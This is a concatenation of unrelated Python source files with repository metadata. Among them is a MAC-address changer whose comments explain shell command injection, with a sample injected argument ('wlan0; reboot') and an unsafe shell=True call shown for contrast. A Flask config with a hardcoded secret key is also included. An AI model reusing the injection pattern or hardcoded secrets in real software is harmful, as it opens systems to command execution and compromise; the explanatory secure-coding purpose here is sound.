for s in nodes:
for t in nodes:
if s == t:
continue
for ed in betweenness.keys():
froms = plist[s]
thru = float(froms.getNumShortestPathsThroughEdge(ed, s, t))
betn = float(froms.getNumShortestPathsBetween(s, t))
incr = 0
if not thru == 0.0 and not betn == 0.0:
incr = thru/betn
betweenness[ed] += incr
return betweenness
def getEdgeBetnSeq(gr = None, nl = None, el = None, apsp = None):
edbseq = getEdgeBetweennessSequence(gr, nl, el, apsp)
return [v for v in edbseq.values()]
def getEdgeBetweennessDistribution(gr = None, nl = None, el = None, apsp = None):
betweenness = getEdgeBetweennessSequence(gr, nl, el, apsp)
total = sum([v for v in betweenness.values()])
for k, v in betweenness.items():
betweenness[k] = v/total
return betweenness
def getEdgeBetnDist(gr = None, nl = None, el = None, apsp = None):
edbdist = getEdgeBetweennessDistribution(gr, nl, el, apsp)
return [v for v in edbdist.values()]
def getEdgeBetweenness(gr, ed):
pass
def getHighestEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
return max(getEdgeBetnSeq(gr, nl, el, apsp))
def getEdgeWithMaxBetweenness(gr = None, nl = None, el = None, apsp = None):
ebseq = getEdgeBetweennessSequence(gr, nl, el, apsp)
return max([(ebseq[k],k) for k in ebseq])[1]
def getAverageEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
if gr:
return sum(getEdgeBetnSeq(gr))/float(gr.getNumEdges())
if nl and el and apsp:
return sum(getEdgeBetnSeq(gr, nl, el, apsp))/float(len(el))
return -1
def getNormalizedHighestEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
return max(getEdgeBetnDist(gr, nl, el, apsp))
def getNormalizedAverageEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
if gr:
return 1.0/float(gr.getNumEdges())
if nl and el and apsp:
return 1.0/float(len(el))
return -1
def getEdgeBetweennessSkew(gr = None, nl = None, el = None, apsp = None):
edbseq = getEdgeBetnSeq(gr, nl, el, apsp)
maxbetn = max(edbseq)
ne = 0
if gr:
ne = float(gr.getNumEdges())
else:
ne = float(len(el))
avbetn = sum(edbseq)/ne
return maxbetn - avbetn
def getNormalizedEdgeBetweennessSkew(gr = None, nl = None, el = None, apsp = None):
edbdist = getEdgeBetnDist(gr, nl, el, apsp)
maxbetn = max(edbdist)
ne = 0
if gr:
ne = float(gr.getNumEdges())
else:
ne = float(len(el))
avbetn = 1.0/ne
return maxbetn - avbetn
if __name__ == '__main__':
print __doc__
|
[
"sanketvpatil@gmail.com"
] |
sanketvpatil@gmail.com
|
6291ac45390f72142bdf12dfd36524ada4640f4a
|
b8ef2769bf6d9159457faa642f57c91a01533ef0
|
/1 mac_changer/macchanger-5.py
|
0ccc2c5350479b116ff7f2adf3745a8aa29cf3c1
|
[] |
no_license
|
C-BOE86/Python-Ethical-Hacking-Tools
|
096d9252096536164a18c6449d105d3807415e51
|
0ca3dd29bc35722e8e6a55a2a6d56036dccb856b
|
refs/heads/master
| 2022-03-23T04:29:30.215390
| 2019-12-03T19:57:57
| 2019-12-03T19:57:57
| 198,090,999
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
#!/usr/bin/python
'''
Gets the values for the interface and MAC address into variables and
then passes those values to the command directly.
Secure code:
it handles user input; if the user puts ; or && to execute another command,
that is stopped by removing shell=True and the single-string command.
Instead of shell=True we pass the executable and its arguments
in a list, one element at a time, which avoids this user-input manipulation.
'''
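# A minimal illustrative sketch (not part of the original script) of the contrast
# described above; "wlan0; reboot" stands in for hypothetical malicious input:
#   Unsafe, injectable form: subprocess.call("ifconfig " + interface + " down", shell=True)
#     -> the text after ";" would run as a second shell command.
#   Safe form used below:    subprocess.call(["ifconfig", interface, "down"])
#     -> the whole value is passed as a single argument to ifconfig.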
'''
We can pass a value as a command-line argument using the sys module,
or as an option with a help message and switches using the optparse module:
python macchanger.py --interface wlan0 --mac 11:aa:dd:ff:gg:hh
python macchanger.py --help prints the help'''
import subprocess
import optparse
parser=optparse.OptionParser() #init the parser object
parser.add_option("-i","--interface",dest="interface",help="Interface to change the mac address")
#adds the options, e.g. the -i or --interface switches; dest is where the passed value gets saved and help displays the help msg for python macchanger.py --help
parser.add_option("-m","--mac",dest="new_mac",help="add new mac address")
(options,arguments)=parser.parse_args()
#the function returns values into these 2 variables, options and arguments
#options holds the parsed values, e.g. wlan0 and aa:bb:cc:dd:ee:ff
#arguments holds any leftover positional arguments (not the -i/--interface and -m/--mac switches)
interface = options.interface
macaddr = options.new_mac
#options contains the values; to get them we call options.interface and options.new_mac
subprocess.call(["ifconfig",interface,"down"])
subprocess.call(["ifconfig",interface,"hw","ether",macaddr])
subprocess.call(["ifconfig",interface,"up"])
print "[+] Changing Mac Address of Interface %s to %s"%(interface,macaddr)
|
[
"noreply@github.com"
] |
C-BOE86.noreply@github.com
|
dc1aca49e98ba1198a880584be42f9758fdd5ebd
|
bd435e3ff491d13c3cb1ffcf34771ac1c80f7859
|
/code/flask/01/app/config.py
|
82b45957f1f35cffc8f4752f0c8de4f86285b81c
|
[] |
no_license
|
luningcowboy/PythonTutorial
|
8f4b6d16e0fad99a226540a6f12639ccdff402ff
|
9024efe8ed22aca0a1271a2c1c388d3ffe1e6690
|
refs/heads/master
| 2021-06-16T23:03:22.153473
| 2020-04-09T13:52:12
| 2020-04-09T13:52:12
| 187,571,993
| 0
| 0
| null | 2021-03-25T23:02:36
| 2019-05-20T05:16:13
|
Python
|
UTF-8
|
Python
| false
| false
| 405
|
py
|
CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
OPENID_PROVIDERS = [
{ 'name': 'Google', 'url':'https://www.google.com/accounts/o8/id'},
{ 'name': 'Yahoo', 'url': 'https://me.yahoo.com' },
{ 'name': 'AOL', 'url': 'http://openid.aol.com/<username>' },
{ 'name': 'Flickr', 'url': 'http://www.flickr.com/<username>' },
{ 'name': 'MyOpenID', 'url': 'https://www.myopenid.com' } ]
|
[
"luningcowboy@gmail.com"
] |
luningcowboy@gmail.com
|
a4e77f0776606f0a309094559dcad9e0c32954f5
|
308953409e1a3b828ac49b7301c1e751cbf762cf
|
/suite_EETc 21/tst_New_Factory_Reset_Import/test.py
|
7b07a75708d02a52cf6a0deb7faad6f848d82f6f
|
[] |
no_license
|
asthagaur1/danfoss-automation
|
4dcc7d8f000917b67e4d6f46ff862a525ddcbc5e
|
213a99d3375889cd0e0c801421a50e9fe6085879
|
refs/heads/main
| 2023-03-31T23:26:56.956107
| 2021-04-01T08:52:37
| 2021-04-01T08:52:37
| 353,627,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
def main():
excel = r"C:\gitworkspace\KoolProg-TestAutomation\Master_Functions\Test_Automation\SourceCode\suite_EETc 21\shared\testdata\New_Factory_Reset_Import.xls";
#Mapping with Global scripts for Function library and key action.
source(findFile("scripts", "Functions.py"))
source(findFile("scripts", "Actions.py"))
# source(findFile("scripts", "object_id.py"))
keyAction(excel)
|
[
"asthagaur@danfoss.com"
] |
asthagaur@danfoss.com
|
db2e8f2e37710404f33d22a0aceafc1fbb6f1009
|
ceeea27fddee32f76d138e5a9b135c9686147676
|
/env/lib/python3.8/site-packages/location/migrations/0008_auto__add_field_locationconsumersettings_icloud_timezone.py
|
2ab1f2e5eaae3f23b949d3c39791b23f64b2cfe5
|
[
"MIT"
] |
permissive
|
angels101/practice-django-framework-api-
|
8e237efc20a797a2d45d836a28eb90f97d1535b7
|
0a888c75126940c33bc7afc14b8d1496c586512f
|
refs/heads/main
| 2023-04-14T17:28:48.136114
| 2021-04-19T11:27:13
| 2021-04-19T11:27:13
| 357,435,663
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,123
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'LocationConsumerSettings.icloud_timezone'
db.add_column(u'location_locationconsumersettings', 'icloud_timezone',
self.gf('django.db.models.fields.CharField')(default='US/Pacific', max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'LocationConsumerSettings.icloud_timezone'
db.delete_column(u'location_locationconsumersettings', 'icloud_timezone')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'location.locationconsumersettings': {
'Meta': {'object_name': 'LocationConsumerSettings'},
'icloud_device_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icloud_password': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_timezone': ('django.db.models.fields.CharField', [], {'default': "'US/Pacific'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'runmeter_email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
'runmeter_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'location_consumer_settings'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'location.locationsnapshot': {
'Meta': {'object_name': 'LocationSnapshot'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'geography': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'points'", 'null': 'True', 'to': u"orm['location.LocationSource']"})
},
u'location.locationsource': {
'Meta': {'object_name': 'LocationSource'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'data': ('jsonfield.fields.JSONField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['location.LocationSourceType']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'location_sources'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'location.locationsourcetype': {
'Meta': {'object_name': 'LocationSourceType'},
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['location']
|
[
"angelscodex101@gmail.com"
] |
angelscodex101@gmail.com
|
284f857566050d27403cbc88caec96c5ddefb015
|
fd87102dc12fff6ab7262aabae7c365c58a9ad6f
|
/audioclick/mblookup.py
|
973066e94adaea02b83e87c378ad37f2ac9526c9
|
[] |
no_license
|
vasuman/audioclick
|
fe3bc62d067c1a3846d69f60bb24a3ed1b257c5d
|
5f60689e53b8fcda3ed61f20ff58feb98d6785b3
|
refs/heads/master
| 2021-01-19T06:32:14.997649
| 2012-08-14T06:09:30
| 2012-08-14T06:09:30
| 5,215,118
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,127
|
py
|
import urllib2
import json
import musicbrainzngs as mb
import logging
mb.set_useragent('AudioClick','0.1dev')
def generate_track(rec_info,final_release):
track={}
track['title']=rec_info['title']
track['artist']=rec_info['artist-credit-phrase']
track['musicbrainz_trackid']=final_release['trackid']
track['album']=final_release['title'].encode('ascii','ignore')
track['date']=final_release['date']
logging.debug(final_release.keys())
track['musicbrainz_albumid']=final_release['id']
return track
def extract_year(release):
if 'date' in release.keys() :
year=int(release['date'].replace('-',''))
if len(release['date'])==4:
year=int(release['date']+'1231')
return year
return -1
def find_oldest_release(releases):
releases.sort(key=extract_year)
for release in releases:
if 'date' in release.keys() and release['status']=='Official':
return release
def single_match(mbids):
(mbid_rec, release_list)=match_recording(mbids)
oldest_release=find_oldest_release(release_list)
oldest_rec=mbid_rec[oldest_release['trackid']]
return generate_track(oldest_rec,oldest_release)
def match_recording(mbids):
release_list=[]
mbid_rec={}
for mbid in mbids:
try:
mbid_info=mb.get_recording_by_id(mbid,['artists','releases'],['official'])['recording']
except mb.musicbrainz.ResponseError :
logging.warning('{0} is an invalid MusicBrainz ID. Skipping...'.format(mbid))
continue
mbid_rlist=mbid_info['release-list']
mbid_rec[mbid]=mbid_info
for item in mbid_rlist:
item['trackid']=mbid
release_list.extend(mbid_rlist)
return (mbid_rec, release_list)
#Yet to be implemented
def album_match(tracked_mbids):
all_releases=[]
album_match={}
for mbids in tracked_mbids:
(mbid_rec, release_list)=match_recording(mbids)
all_releases.extend(release_list)
for item in release_list:
if not item['id'] in album_match:
album_match[item['id']]=1
continue
album_match[item['id']]+=1
match_score=lambda item: album_match[item]
final_album=max(album_match, key=match_score)
print final_album
for item in all_releases:
        if final_album == item['id']:
print item
|
[
"vasumanar@gmail.com"
] |
vasumanar@gmail.com
|
7da2d62723cf241c6ab65437c17e738eed8b2a76
|
e7de2a57c397ba6e3d2059b76b13ca6c4cdce5e8
|
/util.py
|
fa5bcd7c5a19393aa49201d59cdc9ae92cfe8740
|
[
"BSD-3-Clause"
] |
permissive
|
wingpang-gz/decaNLP
|
2a8baedd490748f4fe43a0825b09b3fa6a79769f
|
d776d9f600c127a0a3e28c85960cf0ea615e8f63
|
refs/heads/master
| 2020-03-26T18:07:49.767505
| 2018-08-16T19:51:40
| 2018-08-16T19:51:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,643
|
py
|
from text import torchtext
import time
import os
import sys
import torch
import random
import numpy as np
def get_context_question(ex, context, question, field):
return ex.context_special + ex.context + ex.question_special + ex.question
def preprocess_examples(args, tasks, splits, field, logger=None, train=True):
min_length = 1
max_context_length = args.max_train_context_length if train else args.max_val_context_length
is_too_long = lambda ex: (len(ex.answer)>args.max_answer_length or
len(ex.context)>max_context_length)
is_too_short = lambda ex: (len(ex.answer)<min_length or
len(ex.context)<min_length)
for task, s in zip(tasks, splits):
if logger is not None:
logger.info(f'{task} has {len(s.examples)} examples')
if 'cnn' in task or 'dailymail' in task or 'imdb' in task:
for x in s.examples:
x.context = x.context[:max_context_length]
if train:
l = len(s.examples)
s.examples = [ex for ex in s.examples if not is_too_long(ex)]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering out long {task} examples: {l} -> {len(s.examples)}')
l = len(s.examples)
s.examples = [ex for ex in s.examples if not is_too_short(ex)]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering out short {task} examples: {l} -> {len(s.examples)}')
l = len(s.examples)
s.examples = [ex for ex in s.examples if 'This page includes the show' not in ex.answer]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering {task} examples with a dummy summary: {l} -> {len(s.examples)} ')
if logger is not None:
context_lengths = [len(ex.context) for ex in s.examples]
question_lengths = [len(ex.question) for ex in s.examples]
answer_lengths = [len(ex.answer) for ex in s.examples]
logger.info(f'{task} context lengths (min, mean, max): {np.min(context_lengths)}, {int(np.mean(context_lengths))}, {np.max(context_lengths)}')
logger.info(f'{task} question lengths (min, mean, max): {np.min(question_lengths)}, {int(np.mean(question_lengths))}, {np.max(question_lengths)}')
logger.info(f'{task} answer lengths (min, mean, max): {np.min(answer_lengths)}, {int(np.mean(answer_lengths))}, {np.max(answer_lengths)}')
for x in s.examples:
x.context_question = get_context_question(x, x.context, x.question, field)
if logger is not None:
logger.info('Tokenized examples:')
for ex in s.examples[:10]:
logger.info('Context: ' + ' '.join(ex.context))
logger.info('Question: ' + ' '.join(ex.question))
logger.info(' '.join(ex.context_question))
logger.info('Answer: ' + ' '.join(ex.answer))
def set_seed(args, rank=None):
if rank is not None:
device = args.gpus[rank]
else:
if isinstance(args.gpus, list):
device = args.gpus[0]
else:
device = args.gpus
os.environ['CUDA_VISIBLE_DEVICES'] = f'{device}'
print(f'device: {device}')
np.random.seed(args.seed)
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
def count_params(params):
def mult(ps):
r = 0
for p in ps:
this_r = 1
for s in p.size():
this_r *= s
r += this_r
return r
return mult(params)
def get_trainable_params(model):
return list(filter(lambda p: p.requires_grad, model.parameters()))
def elapsed_time(log):
t = time.time() - log.start
day = int(t // (24 * 3600))
t = t % (24 * 3600)
hour = int(t // 3600)
t %= 3600
minutes = int(t // 60)
t %= 60
seconds = int(t)
return f'{day:02}:{hour:02}:{minutes:02}:{seconds:02}'
def get_splits(args, task, FIELD, **kwargs):
if 'multi30k' in task:
src, trg = ['.'+x for x in task.split('.')[1:]]
split = torchtext.datasets.generic.Multi30k.splits(exts=(src, trg),
fields=FIELD, root=args.data, **kwargs)
if 'iwslt' in task:
src, trg = ['.'+x for x in task.split('.')[1:]]
split = torchtext.datasets.generic.IWSLT.splits(exts=(src, trg),
fields=FIELD, root=args.data, **kwargs)
if 'squad' in task:
split = torchtext.datasets.generic.SQuAD.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'wikisql':
split = torchtext.datasets.generic.WikiSQL.splits(
fields=FIELD, root=args.data, **kwargs)
if 'ontonotes.ner' in task:
split_task = task.split('.')
_, _, subtask, nones, counting = split_task
split = torchtext.datasets.generic.OntoNotesNER.splits(
subtask=subtask, nones=True if nones == 'nones' else False,
fields=FIELD, root=args.data, **kwargs)
if 'woz' in task:
split = torchtext.datasets.generic.WOZ.splits(description=task,
fields=FIELD, root=args.data, **kwargs)
if 'multinli' in task:
split = torchtext.datasets.generic.MultiNLI.splits(description=task,
fields=FIELD, root=args.data, **kwargs)
if 'srl' in task:
split = torchtext.datasets.generic.SRL.splits(
fields=FIELD, root=args.data, **kwargs)
if 'snli' in task:
split = torchtext.datasets.generic.SNLI.splits(
fields=FIELD, root=args.data, **kwargs)
if 'schema' in task:
split = torchtext.datasets.generic.WinogradSchema.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'cnn':
split = torchtext.datasets.generic.CNN.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'dailymail':
split = torchtext.datasets.generic.DailyMail.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'cnn_dailymail':
split_cnn = torchtext.datasets.generic.CNN.splits(
fields=FIELD, root=args.data, **kwargs)
split_dm = torchtext.datasets.generic.DailyMail.splits(
fields=FIELD, root=args.data, **kwargs)
for scnn, sdm in zip(split_cnn, split_dm):
scnn.examples.extend(sdm)
split = split_cnn
if 'sst' in task:
split = torchtext.datasets.generic.SST.splits(
fields=FIELD, root=args.data, **kwargs)
if 'imdb' in task:
kwargs['validation'] = None
split = torchtext.datasets.generic.IMDb.splits(
fields=FIELD, root=args.data, **kwargs)
if 'zre' in task:
split = torchtext.datasets.generic.ZeroShotRE.splits(
fields=FIELD, root=args.data, **kwargs)
elif os.path.exists(os.path.join(args.data, task)):
split = torchtext.datasets.generic.JSON.splits(
fields=FIELD, root=args.data, name=task, **kwargs)
return split
def batch_fn(new, i, sofar):
prev_max_len = sofar / (i - 1) if i > 1 else 0
return max(len(new.context), 5*len(new.answer), prev_max_len) * i
def pad(x, new_channel, dim, val=None):
if x.size(dim) > new_channel:
x = x.narrow(dim, 0, new_channel)
channels = x.size()
assert (new_channel >= channels[dim])
if new_channel == channels[dim]:
return x
size = list(channels)
size[dim] = new_channel - size[dim]
padding = x.new(*size).fill_(val)
return torch.cat([x, padding], dim)
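# Hedged usage sketch (not part of the original module): exercises only the
# generic helpers that need no dataset on disk; shapes and sizes are
# illustrative.
if __name__ == '__main__':
    x = torch.zeros(2, 3)
    padded = pad(x, 5, dim=1, val=0)   # pad the second dimension from 3 to 5
    assert padded.size() == (2, 5)
    model = torch.nn.Linear(4, 2)
    # 4*2 weights + 2 biases = 10 trainable parameters
    print(count_params(get_trainable_params(model)))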
|
[
"bryan.mccann.is@gmail.com"
] |
bryan.mccann.is@gmail.com
|
63bb1f85690d6a2db33908697c2a176e9ed47132
|
442620638423710f68f719b28a645d4041eec346
|
/modules/sql_main.py
|
b2efe37e8570647cdbe95f349a2b65240efb9d36
|
[] |
no_license
|
ivprokofyev/cb_parsing
|
324e0160ebb04926085b51fecb438101f42d76dd
|
c2370679844554f1c96939017cc1875c5a2c214a
|
refs/heads/master
| 2020-04-05T21:49:35.684748
| 2018-12-01T22:37:08
| 2018-12-01T22:38:08
| 157,234,680
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,634
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import psycopg2
class SqlShell:
"""
Middle-end для доступа к БД
Методы:
Для парсеров
countInputParsers - посчет количества записей спарсенных тарифов в БД
getAllIdInputParsers - получение всех записей по ID агента в БД
checkInputParsers - проверка маршрутов на уникальность
insertInputParsers - запись новых маршрутов
updateInputParsers - обновление тарифов для существующих маршрутов
deleteInputParsers - удаление неактуальных маршрутов
Для обработки "сырых" данных
getConvDb - получаем список всех записей для обработки
checkAirportsConvDb - проверка наличия id для наименования аэропорта
checkAirlinesConvDb - проверка наличия id для наименования авиакомпании
checkTypeConvDb - проверка наличия id для типа груза
countRoutesConvDB - количество маршрутов в итоговой БД
routeConvDb - конвертация временных записей парсеров в итоговую таблицу Маршрутов
rateRowConvDb - проверка зависимости от весовых диапозонов
rateConvDb - конвертация временных записей парсеров в итоговую таблицу Тарифов
addAirportConvDb - добавление наименования аэропорта в альтернативный справочник
addAirlineConvDb - добавление наименования авиакомпании в альтернативный справочник
addTypeConvDb - добавление наименования типа груза в альтернативный справочник
Общие
closeConnection - закрытие курсора и соединения к БД для экземпляра класса
"""
DATABASE = {
'local': "host='localhost' dbname='****' user='****' password='****'"
}
def __init__(self,
connection=DATABASE['local']
):
self.connection = psycopg2.connect(connection)
self.cursor = self.connection.cursor()
def countInputParsers(self):
self.cursor.execute('''select count(*)
from input_parsers''')
count_row = self.cursor.fetchall()[0][0]
return count_row
def getAllIdInputParsers(self, id_carrier):
self.cursor.execute('''select id_record_parsers
from input_parsers
where id_carrier = %s''', (id_carrier,))
return self.cursor.fetchall()
def checkInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
airport_transit_ikao=None,
airport_from_name=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''select id_record_parsers
from input_parsers
where id_carrier = %s
and (airport_from_ikao = %s or airport_from_ikao is null)
and (city_to = %s or city_to is null)
and (airline_ikao = %s or airline_ikao is null)
and (city_transit = %s or city_transit is null)
and (airport_transit_ikao = %s or airport_transit_ikao is null)
and (airport_from_name = %s or airport_from_name is null)
and (airport_from_iata = %s or airport_from_iata is null)
and (airport_transit_iata = %s or airport_transit_iata is null)
and (city_from = %s or city_from is null)
''', (id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
city_transit,
airport_transit_ikao,
airport_from_name,
airport_from_iata,
airport_transit_iata,
city_from))
return self.cursor.fetchall()
def insertInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
weight_min_kg=None,
rate_1_rub=None,
airport_transit_ikao=None,
airport_from_name=None,
cost_min_rub=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''
insert into input_parsers(
id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
weight_min_kg,
weight_1_from_kg,
weight_1_to_kg,
rate_1_rub,
cargo_type,
city_transit,
airport_transit_ikao,
airport_from_name,
cost_min_rub,
airport_from_iata,
airport_transit_iata,
city_from
)
values (
%s,
%s,
%s,
%s,
%s,
0,
9999,
%s,
'GENERAL',
%s,
%s,
%s,
%s,
%s,
%s,
%s
)
RETURNING id_record_parsers
''', (id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
weight_min_kg,
rate_1_rub,
city_transit,
airport_transit_ikao,
airport_from_name,
cost_min_rub,
airport_from_iata,
airport_transit_iata,
city_from))
self.connection.commit()
return self.cursor.fetchall()
def updateInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
weight_min_kg=None,
rate_1_rub=None,
airport_transit_ikao=None,
airport_from_name=None,
cost_min_rub=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''
update input_parsers
set weight_min_kg = %s,
rate_1_rub = %s,
cost_min_rub = %s
where id_carrier = %s
and (airport_from_ikao = %s or airport_from_ikao is null)
and (city_to = %s or city_to is null)
and (airline_ikao = %s or airline_ikao is null)
and (city_transit = %s or city_transit is null)
and (airport_transit_ikao = %s or airport_transit_ikao is null)
and (airport_from_name = %s or airport_from_name is null)
and (airport_from_iata = %s or airport_from_iata is null)
and (airport_transit_iata = %s or airport_transit_iata is null)
and (city_from = %s or city_from is null)
RETURNING id_record_parsers
''', (weight_min_kg,
rate_1_rub,
cost_min_rub,
id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
city_transit,
airport_transit_ikao,
airport_from_name,
airport_from_iata,
airport_transit_iata,
city_from))
self.connection.commit()
return self.cursor.fetchall()
def deleteInputParsers(self, id_record_parsers=None):
self.cursor.execute('''delete
from input_parsers
where id_record_parsers = %s
''', (id_record_parsers,))
self.connection.commit()
def getConvDb(self):
self.cursor.execute('''
select city_from,
airport_from_iata,
airport_from_ikao,
airport_from_name,
city_to,
airport_to_iata,
airport_to_ikao,
airport_to_name,
city_transit,
airport_transit_iata,
airport_transit_ikao,
airport_transit_name,
airline_name,
airline_iata,
airline_ikao,
id_carrier,
cargo_type,
id_record_parsers
from input_parsers;
''')
return self.cursor.fetchall()
def checkAirportsConvDb(self, airport=None):
self.cursor.execute('''
select id_airport
from airports
where lower(%s) in (
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s);
''', (airport, airport))
return self.cursor.fetchone()
def checkAirlinesConvDb(self, airline=None):
self.cursor.execute('''
select id_airlines
from airlines
where lower(%s) in (
lower(airline_name),
lower(airline_iata),
lower(airline_ikao)
)
union
select id_airlines
from airlines_alt
where lower(airlines_name_alt) = lower(%s);
''', (airline, airline))
return self.cursor.fetchone()
def checkTypeConvDb(self, type=None):
self.cursor.execute('''
select id_cargo_type
from cargo_type
where lower(cargo_type_name) = lower(%s)
''', (type, ))
return self.cursor.fetchone()
def countRoutesConvDB(self):
self.cursor.execute('''select count(*) from carrier_routes''')
return self.cursor.fetchall()[0][0]
def routeConvDb(self,
id_record_parsers=None,
id_carrier=None,
id_airport_from=None,
id_airport_to=None,
id_airport_transit=None,
id_airline=None,
id_cargo_type=None
):
self.cursor.execute('''
insert into carrier_routes
(
id_record_parsers,
id_carrier,
id_airport_from,
id_airport_to,
id_airport_transit,
id_airlines,
id_cargo_type
)
values
(
%s,
%s,
(
select id_airport
from airports
where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airport
from airports
